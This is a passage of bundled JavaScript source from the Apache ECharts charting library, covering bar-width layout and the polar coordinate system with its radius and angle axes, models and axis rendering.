baseAxis.getExtent();\n        var bandWidth = baseAxis.type === 'category'\n            ? baseAxis.getBandWidth()\n            : (Math.abs(axisExtent[1] - axisExtent[0]) / data.count());\n\n        var columnsOnAxis = columnsMap[axisKey] || {\n            bandWidth: bandWidth,\n            remainedWidth: bandWidth,\n            autoWidthCount: 0,\n            categoryGap: '20%',\n            gap: '30%',\n            stacks: {}\n        };\n        var stacks = columnsOnAxis.stacks;\n        columnsMap[axisKey] = columnsOnAxis;\n\n        var stackId = getSeriesStackId$1(seriesModel);\n\n        if (!stacks[stackId]) {\n            columnsOnAxis.autoWidthCount++;\n        }\n        stacks[stackId] = stacks[stackId] || {\n            width: 0,\n            maxWidth: 0\n        };\n\n        var barWidth = parsePercent$1(\n            seriesModel.get('barWidth'),\n            bandWidth\n        );\n        var barMaxWidth = parsePercent$1(\n            seriesModel.get('barMaxWidth'),\n            bandWidth\n        );\n        var barGap = seriesModel.get('barGap');\n        var barCategoryGap = seriesModel.get('barCategoryGap');\n\n        if (barWidth && !stacks[stackId].width) {\n            barWidth = Math.min(columnsOnAxis.remainedWidth, barWidth);\n            stacks[stackId].width = barWidth;\n            columnsOnAxis.remainedWidth -= barWidth;\n        }\n\n        barMaxWidth && (stacks[stackId].maxWidth = barMaxWidth);\n        (barGap != null) && (columnsOnAxis.gap = barGap);\n        (barCategoryGap != null) && (columnsOnAxis.categoryGap = barCategoryGap);\n    });\n\n\n    var result = {};\n\n    each$1(columnsMap, function (columnsOnAxis, coordSysName) {\n\n        result[coordSysName] = {};\n\n        var stacks = columnsOnAxis.stacks;\n        var bandWidth = columnsOnAxis.bandWidth;\n        var categoryGap = parsePercent$1(columnsOnAxis.categoryGap, bandWidth);\n        var barGapPercent = parsePercent$1(columnsOnAxis.gap, 1);\n\n        var remainedWidth = columnsOnAxis.remainedWidth;\n        var autoWidthCount = columnsOnAxis.autoWidthCount;\n        var autoWidth = (remainedWidth - categoryGap)\n            / (autoWidthCount + (autoWidthCount - 1) * barGapPercent);\n        autoWidth = Math.max(autoWidth, 0);\n\n        // Find if any auto calculated bar exceeded maxBarWidth\n        each$1(stacks, function (column, stack) {\n            var maxWidth = column.maxWidth;\n            if (maxWidth && maxWidth < autoWidth) {\n                maxWidth = Math.min(maxWidth, remainedWidth);\n                if (column.width) {\n                    maxWidth = Math.min(maxWidth, column.width);\n                }\n                remainedWidth -= maxWidth;\n                column.width = maxWidth;\n                autoWidthCount--;\n            }\n        });\n\n        // Recalculate width again\n        autoWidth = (remainedWidth - categoryGap)\n            / (autoWidthCount + (autoWidthCount - 1) * barGapPercent);\n        autoWidth = Math.max(autoWidth, 0);\n\n        var widthSum = 0;\n        var lastColumn;\n        each$1(stacks, function (column, idx) {\n            if (!column.width) {\n                column.width = autoWidth;\n            }\n            lastColumn = column;\n            widthSum += column.width * (1 + barGapPercent);\n        });\n        if (lastColumn) {\n            widthSum -= lastColumn.width * barGapPercent;\n        }\n\n        var offset = -widthSum / 2;\n        each$1(stacks, function (column, stackId) {\n            result[coordSysName][stackId] = result[coordSysName][stackId] || {\n                offset: offset,\n                width: column.width\n            };\n\n            offset += column.width * (1 + barGapPercent);\n        });\n    });\n\n    return result;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction RadiusAxis(scale, radiusExtent) {\n\n    Axis.call(this, 'radius', scale, radiusExtent);\n\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = 'category';\n}\n\nRadiusAxis.prototype = {\n\n    constructor: RadiusAxis,\n\n    /**\n     * @override\n     */\n    pointToData: function (point, clamp) {\n        return this.polar.pointToData(point, clamp)[this.dim === 'radius' ? 0 : 1];\n    },\n\n    dataToRadius: Axis.prototype.dataToCoord,\n\n    radiusToData: Axis.prototype.coordToData\n};\n\ninherits(RadiusAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$12 = makeInner();\n\nfunction AngleAxis(scale, angleExtent) {\n\n    angleExtent = angleExtent || [0, 360];\n\n    Axis.call(this, 'angle', scale, angleExtent);\n\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = 'category';\n}\n\nAngleAxis.prototype = {\n\n    constructor: AngleAxis,\n\n    /**\n     * @override\n     */\n    pointToData: function (point, clamp) {\n        return this.polar.pointToData(point, clamp)[this.dim === 'radius' ? 0 : 1];\n    },\n\n    dataToAngle: Axis.prototype.dataToCoord,\n\n    angleToData: Axis.prototype.coordToData,\n\n    /**\n     * Only be called in category axis.\n     * Angle axis uses text height to decide interval\n     *\n     * @override\n     * @return {number} Auto interval for cateogry axis tick and label\n     */\n    calculateCategoryInterval: function () {\n        var axis = this;\n        var labelModel = axis.getLabelModel();\n\n        var ordinalScale = axis.scale;\n        var ordinalExtent = ordinalScale.getExtent();\n        // Providing this method is for optimization:\n        // avoid generating a long array by `getTicks`\n        // in large category data case.\n        var tickCount = ordinalScale.count();\n\n        if (ordinalExtent[1] - ordinalExtent[0] < 1) {\n            return 0;\n        }\n\n        var tickValue = ordinalExtent[0];\n        var unitSpan = axis.dataToCoord(tickValue + 1) - axis.dataToCoord(tickValue);\n        var unitH = Math.abs(unitSpan);\n\n        // Not precise, just use height as text width\n        // and each distance from axis line yet.\n        var rect = getBoundingRect(\n            tickValue, labelModel.getFont(), 'center', 'top'\n        );\n        var maxH = Math.max(rect.height, 7);\n\n        var dh = maxH / unitH;\n        // 0/0 is NaN, 1/0 is Infinity.\n        isNaN(dh) && (dh = Infinity);\n        var interval = Math.max(0, Math.floor(dh));\n\n        var cache = inner$12(axis.model);\n        var lastAutoInterval = cache.lastAutoInterval;\n        var lastTickCount = cache.lastTickCount;\n\n        // Use cache to keep interval stable while moving zoom window,\n        // otherwise the calculated interval might jitter when the zoom\n        // window size is close to the interval-changing size.\n        if (lastAutoInterval != null\n            && lastTickCount != null\n            && Math.abs(lastAutoInterval - interval) <= 1\n            && Math.abs(lastTickCount - tickCount) <= 1\n            // Always choose the bigger one, otherwise the critical\n            // point is not the same when zooming in or zooming out.\n            && lastAutoInterval > interval\n        ) {\n            interval = lastAutoInterval;\n        }\n        // Only update cache if cache not used, otherwise the\n        // changing of interval is too insensitive.\n        else {\n            cache.lastTickCount = tickCount;\n            cache.lastAutoInterval = interval;\n        }\n\n        return interval;\n    }\n};\n\ninherits(AngleAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/coord/polar/Polar\n */\n\n/**\n * @alias {module:echarts/coord/polar/Polar}\n * @constructor\n * @param {string} name\n */\nvar Polar = function (name) {\n\n    /**\n     * @type {string}\n     */\n    this.name = name || '';\n\n    /**\n     * x of polar center\n     * @type {number}\n     */\n    this.cx = 0;\n\n    /**\n     * y of polar center\n     * @type {number}\n     */\n    this.cy = 0;\n\n    /**\n     * @type {module:echarts/coord/polar/RadiusAxis}\n     * @private\n     */\n    this._radiusAxis = new RadiusAxis();\n\n    /**\n     * @type {module:echarts/coord/polar/AngleAxis}\n     * @private\n     */\n    this._angleAxis = new AngleAxis();\n\n    this._radiusAxis.polar = this._angleAxis.polar = this;\n};\n\nPolar.prototype = {\n\n    type: 'polar',\n\n    axisPointerEnabled: true,\n\n    constructor: Polar,\n\n    /**\n     * @param {Array.<string>}\n     * @readOnly\n     */\n    dimensions: ['radius', 'angle'],\n\n    /**\n     * @type {module:echarts/coord/PolarModel}\n     */\n    model: null,\n\n    /**\n     * If contain coord\n     * @param {Array.<number>} point\n     * @return {boolean}\n     */\n    containPoint: function (point) {\n        var coord = this.pointToCoord(point);\n        return this._radiusAxis.contain(coord[0])\n            && this._angleAxis.contain(coord[1]);\n    },\n\n    /**\n     * If contain data\n     * @param {Array.<number>} data\n     * @return {boolean}\n     */\n    containData: function (data) {\n        return this._radiusAxis.containData(data[0])\n            && this._angleAxis.containData(data[1]);\n    },\n\n    /**\n     * @param {string} dim\n     * @return {module:echarts/coord/polar/AngleAxis|module:echarts/coord/polar/RadiusAxis}\n     */\n    getAxis: function (dim) {\n        return this['_' + dim + 'Axis'];\n    },\n\n    /**\n     * @return {Array.<module:echarts/coord/Axis>}\n     */\n    getAxes: function () {\n        return [this._radiusAxis, this._angleAxis];\n    },\n\n    /**\n     * Get axes by type of scale\n     * @param {string} scaleType\n     * @return {module:echarts/coord/polar/AngleAxis|module:echarts/coord/polar/RadiusAxis}\n     */\n    getAxesByScale: function (scaleType) {\n        var axes = [];\n        var angleAxis = this._angleAxis;\n        var radiusAxis = this._radiusAxis;\n        angleAxis.scale.type === scaleType && axes.push(angleAxis);\n        radiusAxis.scale.type === scaleType && axes.push(radiusAxis);\n\n        return axes;\n    },\n\n    /**\n     * @return {module:echarts/coord/polar/AngleAxis}\n     */\n    getAngleAxis: function () {\n        return this._angleAxis;\n    },\n\n    /**\n     * @return {module:echarts/coord/polar/RadiusAxis}\n     */\n    getRadiusAxis: function () {\n        return this._radiusAxis;\n    },\n\n    /**\n     * @param {module:echarts/coord/polar/Axis}\n     * @return {module:echarts/coord/polar/Axis}\n     */\n    getOtherAxis: function (axis) {\n        var angleAxis = this._angleAxis;\n        return axis === angleAxis ? this._radiusAxis : angleAxis;\n    },\n\n    /**\n     * Base axis will be used on stacking.\n     *\n     * @return {module:echarts/coord/polar/Axis}\n     */\n    getBaseAxis: function () {\n        return this.getAxesByScale('ordinal')[0]\n            || this.getAxesByScale('time')[0]\n            || this.getAngleAxis();\n    },\n\n    /**\n     * @param {string} [dim] 'radius' or 'angle' or 'auto' or null/undefined\n     * @return {Object} {baseAxes: [], otherAxes: []}\n     */\n    getTooltipAxes: function (dim) {\n        var baseAxis = (dim != null && dim !== 'auto')\n            ? this.getAxis(dim) : this.getBaseAxis();\n        return {\n            baseAxes: [baseAxis],\n            otherAxes: [this.getOtherAxis(baseAxis)]\n        };\n    },\n\n    /**\n     * Convert a single data item to (x, y) point.\n     * Parameter data is an array which the first element is radius and the second is angle\n     * @param {Array.<number>} data\n     * @param {boolean} [clamp=false]\n     * @return {Array.<number>}\n     */\n    dataToPoint: function (data, clamp) {\n        return this.coordToPoint([\n            this._radiusAxis.dataToRadius(data[0], clamp),\n            this._angleAxis.dataToAngle(data[1], clamp)\n        ]);\n    },\n\n    /**\n     * Convert a (x, y) point to data\n     * @param {Array.<number>} point\n     * @param {boolean} [clamp=false]\n     * @return {Array.<number>}\n     */\n    pointToData: function (point, clamp) {\n        var coord = this.pointToCoord(point);\n        return [\n            this._radiusAxis.radiusToData(coord[0], clamp),\n            this._angleAxis.angleToData(coord[1], clamp)\n        ];\n    },\n\n    /**\n     * Convert a (x, y) point to (radius, angle) coord\n     * @param {Array.<number>} point\n     * @return {Array.<number>}\n     */\n    pointToCoord: function (point) {\n        var dx = point[0] - this.cx;\n        var dy = point[1] - this.cy;\n        var angleAxis = this.getAngleAxis();\n        var extent = angleAxis.getExtent();\n        var minAngle = Math.min(extent[0], extent[1]);\n        var maxAngle = Math.max(extent[0], extent[1]);\n        // Fix fixed extent in polarCreator\n        // FIXME\n        angleAxis.inverse\n            ? (minAngle = maxAngle - 360)\n            : (maxAngle = minAngle + 360);\n\n        var radius = Math.sqrt(dx * dx + dy * dy);\n        dx /= radius;\n        dy /= radius;\n\n        var radian = Math.atan2(-dy, dx) / Math.PI * 180;\n\n        // move to angleExtent\n        var dir = radian < minAngle ? 1 : -1;\n        while (radian < minAngle || radian > maxAngle) {\n            radian += dir * 360;\n        }\n\n        return [radius, radian];\n    },\n\n    /**\n     * Convert a (radius, angle) coord to (x, y) point\n     * @param {Array.<number>} coord\n     * @return {Array.<number>}\n     */\n    coordToPoint: function (coord) {\n        var radius = coord[0];\n        var radian = coord[1] / 180 * Math.PI;\n        var x = Math.cos(radian) * radius + this.cx;\n        // Inverse the y\n        var y = -Math.sin(radian) * radius + this.cy;\n\n        return [x, y];\n    },\n\n    /**\n     * Get ring area of cartesian.\n     * Area will have a contain function to determine if a point is in the coordinate system.\n     * @return {Ring}\n     */\n    getArea: function () {\n\n        var angleAxis = this.getAngleAxis();\n        var radiusAxis = this.getRadiusAxis();\n\n        var radiusExtent = radiusAxis.getExtent().slice();\n        radiusExtent[0] > radiusExtent[1] && radiusExtent.reverse();\n        var angleExtent = angleAxis.getExtent();\n\n        var RADIAN = Math.PI / 180;\n\n        return {\n            cx: this.cx,\n            cy: this.cy,\n            r0: radiusExtent[0],\n            r: radiusExtent[1],\n            startAngle: -angleExtent[0] * RADIAN,\n            endAngle: -angleExtent[1] * RADIAN,\n            clockwise: angleAxis.inverse,\n            contain: function (x, y) {\n                // It's a ring shape.\n                // Start angle and end angle don't matter\n                var dx = x - this.cx;\n                var dy = y - this.cy;\n                var d2 = dx * dx + dy * dy;\n                var r = this.r;\n                var r0 = this.r0;\n\n                return d2 <= r * r && d2 >= r0 * r0;\n            }\n        };\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PolarAxisModel = ComponentModel.extend({\n\n    type: 'polarAxis',\n\n    /**\n     * @type {module:echarts/coord/polar/AngleAxis|module:echarts/coord/polar/RadiusAxis}\n     */\n    axis: null,\n\n    /**\n     * @override\n     */\n    getCoordSysModel: function () {\n        return this.ecModel.queryComponents({\n            mainType: 'polar',\n            index: this.option.polarIndex,\n            id: this.option.polarId\n        })[0];\n    }\n\n});\n\nmerge(PolarAxisModel.prototype, axisModelCommonMixin);\n\nvar polarAxisDefaultExtendedOption = {\n    angle: {\n        // polarIndex: 0,\n        // polarId: '',\n\n        startAngle: 90,\n\n        clockwise: true,\n\n        splitNumber: 12,\n\n        axisLabel: {\n            rotate: false\n        }\n    },\n    radius: {\n        // polarIndex: 0,\n        // polarId: '',\n\n        splitNumber: 5\n    }\n};\n\nfunction getAxisType$3(axisDim, option) {\n    // Default axis with data is category axis\n    return option.type || (option.data ? 'category' : 'value');\n}\n\naxisModelCreator('angle', PolarAxisModel, getAxisType$3, polarAxisDefaultExtendedOption.angle);\naxisModelCreator('radius', PolarAxisModel, getAxisType$3, polarAxisDefaultExtendedOption.radius);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentModel({\n\n    type: 'polar',\n\n    dependencies: ['polarAxis', 'angleAxis'],\n\n    /**\n     * @type {module:echarts/coord/polar/Polar}\n     */\n    coordinateSystem: null,\n\n    /**\n     * @param {string} axisType\n     * @return {module:echarts/coord/polar/AxisModel}\n     */\n    findAxisModel: function (axisType) {\n        var foundAxisModel;\n        var ecModel = this.ecModel;\n\n        ecModel.eachComponent(axisType, function (axisModel) {\n            if (axisModel.getCoordSysModel() === this) {\n                foundAxisModel = axisModel;\n            }\n        }, this);\n        return foundAxisModel;\n    },\n\n    defaultOption: {\n\n        zlevel: 0,\n\n        z: 0,\n\n        center: ['50%', '50%'],\n\n        radius: '80%'\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO Axis scale\n\n/**\n * Resize method bound to the polar\n * @param {module:echarts/coord/polar/PolarModel} polarModel\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction resizePolar(polar, polarModel, api) {\n    var center = polarModel.get('center');\n    var width = api.getWidth();\n    var height = api.getHeight();\n\n    polar.cx = parsePercent$1(center[0], width);\n    polar.cy = parsePercent$1(center[1], height);\n\n    var radiusAxis = polar.getRadiusAxis();\n    var size = Math.min(width, height) / 2;\n\n    var radius = polarModel.get('radius');\n    if (radius == null) {\n        radius = [0, '100%'];\n    }\n    else if (!isArray(radius)) {\n        // r0 = 0\n        radius = [0, radius];\n    }\n    radius = [\n        parsePercent$1(radius[0], size),\n        parsePercent$1(radius[1], size)\n    ];\n\n    radiusAxis.inverse\n        ? radiusAxis.setExtent(radius[1], radius[0])\n        : radiusAxis.setExtent(radius[0], radius[1]);\n}\n\n/**\n * Update polar\n */\nfunction updatePolarScale(ecModel, api) {\n    var polar = this;\n    var angleAxis = polar.getAngleAxis();\n    var radiusAxis = polar.getRadiusAxis();\n    // Reset scale\n    angleAxis.scale.setExtent(Infinity, -Infinity);\n    radiusAxis.scale.setExtent(Infinity, -Infinity);\n\n    ecModel.eachSeries(function (seriesModel) {\n        if (seriesModel.coordinateSystem === polar) {\n            var data = seriesModel.getData();\n            each$1(data.mapDimension('radius', true), function (dim) {\n                radiusAxis.scale.unionExtentFromData(\n                    data, getStackedDimension(data, dim)\n                );\n            });\n            each$1(data.mapDimension('angle', true), function (dim) {\n                angleAxis.scale.unionExtentFromData(\n                    data, getStackedDimension(data, dim)\n                );\n            });\n        }\n    });\n\n    niceScaleExtent(angleAxis.scale, angleAxis.model);\n    niceScaleExtent(radiusAxis.scale, radiusAxis.model);\n\n    // Fix extent of category angle axis\n    if (angleAxis.type === 'category' && !angleAxis.onBand) {\n        var extent = angleAxis.getExtent();\n        var diff = 360 / angleAxis.scale.count();\n        angleAxis.inverse ? (extent[1] += diff) : (extent[1] -= diff);\n        angleAxis.setExtent(extent[0], extent[1]);\n    }\n}\n\n/**\n * Set common axis properties\n * @param {module:echarts/coord/polar/AngleAxis|module:echarts/coord/polar/RadiusAxis}\n * @param {module:echarts/coord/polar/AxisModel}\n * @inner\n */\nfunction setAxis(axis, axisModel) {\n    axis.type = axisModel.get('type');\n    axis.scale = createScaleByModel(axisModel);\n    axis.onBand = axisModel.get('boundaryGap') && axis.type === 'category';\n    axis.inverse = axisModel.get('inverse');\n\n    if (axisModel.mainType === 'angleAxis') {\n        axis.inverse ^= axisModel.get('clockwise');\n        var startAngle = axisModel.get('startAngle');\n        axis.setExtent(startAngle, startAngle + (axis.inverse ? -360 : 360));\n    }\n\n    // Inject axis instance\n    axisModel.axis = axis;\n    axis.model = axisModel;\n}\n\n\nvar polarCreator = {\n\n    dimensions: Polar.prototype.dimensions,\n\n    create: function (ecModel, api) {\n        var polarList = [];\n        ecModel.eachComponent('polar', function (polarModel, idx) {\n            var polar = new Polar(idx);\n            // Inject resize and update method\n            polar.update = updatePolarScale;\n\n            var radiusAxis = polar.getRadiusAxis();\n            var angleAxis = polar.getAngleAxis();\n\n            var radiusAxisModel = polarModel.findAxisModel('radiusAxis');\n            var angleAxisModel = polarModel.findAxisModel('angleAxis');\n\n            setAxis(radiusAxis, radiusAxisModel);\n            setAxis(angleAxis, angleAxisModel);\n\n            resizePolar(polar, polarModel, api);\n\n            polarList.push(polar);\n\n            polarModel.coordinateSystem = polar;\n            polar.model = polarModel;\n        });\n        // Inject coordinateSystem to series\n        ecModel.eachSeries(function (seriesModel) {\n            if (seriesModel.get('coordinateSystem') === 'polar') {\n                var polarModel = ecModel.queryComponents({\n                    mainType: 'polar',\n                    index: seriesModel.get('polarIndex'),\n                    id: seriesModel.get('polarId')\n                })[0];\n\n                if (__DEV__) {\n                    if (!polarModel) {\n                        throw new Error(\n                            'Polar \"' + retrieve(\n                                seriesModel.get('polarIndex'),\n                                seriesModel.get('polarId'),\n                                0\n                            ) + '\" not found'\n                        );\n                    }\n                }\n                seriesModel.coordinateSystem = polarModel.coordinateSystem;\n            }\n        });\n\n        return polarList;\n    }\n};\n\nCoordinateSystemManager.register('polar', polarCreator);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar elementList$1 = ['axisLine', 'axisLabel', 'axisTick', 'minorTick', 'splitLine', 'minorSplitLine', 'splitArea'];\n\nfunction getAxisLineShape(polar, rExtent, angle) {\n    rExtent[1] > rExtent[0] && (rExtent = rExtent.slice().reverse());\n    var start = polar.coordToPoint([rExtent[0], angle]);\n    var end = polar.coordToPoint([rExtent[1], angle]);\n\n    return {\n        x1: start[0],\n        y1: start[1],\n        x2: end[0],\n        y2: end[1]\n    };\n}\n\nfunction getRadiusIdx(polar) {\n    var radiusAxis = polar.getRadiusAxis();\n    return radiusAxis.inverse ? 0 : 1;\n}\n\n// Remove the last tick which will overlap the first tick\nfunction fixAngleOverlap(list) {\n    var firstItem = list[0];\n    var lastItem = list[list.length - 1];\n    if (firstItem\n        && lastItem\n        && Math.abs(Math.abs(firstItem.coord - lastItem.coord) - 360) < 1e-4\n    ) {\n        list.pop();\n    }\n}\n\nAxisView.extend({\n\n    type: 'angleAxis',\n\n    axisPointerClass: 'PolarAxisPointer',\n\n    render: function (angleAxisModel, ecModel) {\n        this.group.removeAll();\n        if (!angleAxisModel.get('show')) {\n            return;\n        }\n\n        var angleAxis = angleAxisModel.axis;\n        var polar = angleAxis.polar;\n        var radiusExtent = polar.getRadiusAxis().getExtent();\n\n        var ticksAngles = angleAxis.getTicksCoords();\n        var minorTickAngles = angleAxis.getMinorTicksCoords();\n\n        var labels = map(angleAxis.getViewLabels(), function (labelItem) {\n            var labelItem = clone(labelItem);\n            labelItem.coord = angleAxis.dataToCoord(labelItem.tickValue);\n            return labelItem;\n        });\n\n        fixAngleOverlap(labels);\n        fixAngleOverlap(ticksAngles);\n\n        each$1(elementList$1, function (name) {\n            if (angleAxisModel.get(name + '.show')\n                && (!angleAxis.scale.isBlank() || name === 'axisLine')\n            ) {\n                this['_' + name](angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent, labels);\n            }\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _axisLine: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent) {\n        var lineStyleModel = angleAxisModel.getModel('axisLine.lineStyle');\n\n        // extent id of the axis radius (r0 and r)\n        var rId = getRadiusIdx(polar);\n        var r0Id = rId ? 0 : 1;\n\n        var shape;\n        if (radiusExtent[r0Id] === 0) {\n            shape = new Circle({\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r: radiusExtent[rId]\n                },\n                style: lineStyleModel.getLineStyle(),\n                z2: 1,\n                silent: true\n            });\n        }\n        else {\n            shape = new Ring({\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r: radiusExtent[rId],\n                    r0: radiusExtent[r0Id]\n                },\n                style: lineStyleModel.getLineStyle(),\n                z2: 1,\n                silent: true\n            });\n        }\n        shape.style.fill = null;\n        this.group.add(shape);\n    },\n\n    /**\n     * @private\n     */\n    _axisTick: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent) {\n        var tickModel = angleAxisModel.getModel('axisTick');\n\n        var tickLen = (tickModel.get('inside') ? -1 : 1) * tickModel.get('length');\n        var radius = radiusExtent[getRadiusIdx(polar)];\n\n        var lines = map(ticksAngles, function (tickAngleItem) {\n            return new Line({\n                shape: getAxisLineShape(polar, [radius, radius + tickLen], tickAngleItem.coord)\n            });\n        });\n        this.group.add(mergePath(\n            lines, {\n                style: defaults(\n                    tickModel.getModel('lineStyle').getLineStyle(),\n                    {\n                        stroke: angleAxisModel.get('axisLine.lineStyle.color')\n                    }\n                )\n            }\n        ));\n    },\n\n    /**\n     * @private\n     */\n    _minorTick: function (angleAxisModel, polar, tickAngles, minorTickAngles, radiusExtent) {\n        if (!minorTickAngles.length) {\n            return;\n        }\n\n        var tickModel = angleAxisModel.getModel('axisTick');\n        var minorTickModel = angleAxisModel.getModel('minorTick');\n\n        var tickLen = (tickModel.get('inside') ? -1 : 1) * minorTickModel.get('length');\n        var radius = radiusExtent[getRadiusIdx(polar)];\n\n        var lines = [];\n\n        for (var i = 0; i < minorTickAngles.length; i++) {\n            for (var k = 0; k < minorTickAngles[i].length; k++) {\n                lines.push(new Line({\n                    shape: getAxisLineShape(polar, [radius, radius + tickLen], minorTickAngles[i][k].coord)\n                }));\n            }\n        }\n\n        this.group.add(mergePath(\n            lines, {\n                style: defaults(\n                    minorTickModel.getModel('lineStyle').getLineStyle(),\n                    defaults(\n                        tickModel.getLineStyle(), {\n                            stroke: angleAxisModel.get('axisLine.lineStyle.color')\n                        }\n                    )\n                )\n            }\n        ));\n    },\n\n    /**\n     * @private\n     */\n    _axisLabel: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent, labels) {\n        var rawCategoryData = angleAxisModel.getCategories(true);\n\n        var commonLabelModel = angleAxisModel.getModel('axisLabel');\n\n        var labelMargin = commonLabelModel.get('margin');\n        var triggerEvent = angleAxisModel.get('triggerEvent');\n\n        // Use length of ticksAngles because it may remove the last tick to avoid overlapping\n        each$1(labels, function (labelItem, idx) {\n            var labelModel = commonLabelModel;\n            var tickValue = labelItem.tickValue;\n\n            var r = radiusExtent[getRadiusIdx(polar)];\n            var p = polar.coordToPoint([r + labelMargin, labelItem.coord]);\n            var cx = polar.cx;\n            var cy = polar.cy;\n\n            var labelTextAlign = Math.abs(p[0] - cx) / r < 0.3\n                ? 'center' : (p[0] > cx ? 'left' : 'right');\n            var labelTextVerticalAlign = Math.abs(p[1] - cy) / r < 0.3\n                ? 'middle' : (p[1] > cy ? 'top' : 'bottom');\n\n            if (rawCategoryData && rawCategoryData[tickValue] && rawCategoryData[tickValue].textStyle) {\n                labelModel = new Model(\n                    rawCategoryData[tickValue].textStyle, commonLabelModel, commonLabelModel.ecModel\n                );\n            }\n\n            var textEl = new Text({\n                silent: AxisBuilder.isLabelSilent(angleAxisModel)\n            });\n            this.group.add(textEl);\n            setTextStyle(textEl.style, labelModel, {\n                x: p[0],\n                y: p[1],\n                textFill: labelModel.getTextColor() || angleAxisModel.get('axisLine.lineStyle.color'),\n                text: labelItem.formattedLabel,\n                textAlign: labelTextAlign,\n                textVerticalAlign: labelTextVerticalAlign\n            });\n\n            // Pack data for mouse event\n            if (triggerEvent) {\n                textEl.eventData = AxisBuilder.makeAxisEventDataBase(angleAxisModel);\n                textEl.eventData.targetType = 'axisLabel';\n                textEl.eventData.value = labelItem.rawLabel;\n            }\n\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _splitLine: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent) {\n        var splitLineModel = angleAxisModel.getModel('splitLine');\n        var lineStyleModel = splitLineModel.getModel('lineStyle');\n        var lineColors = 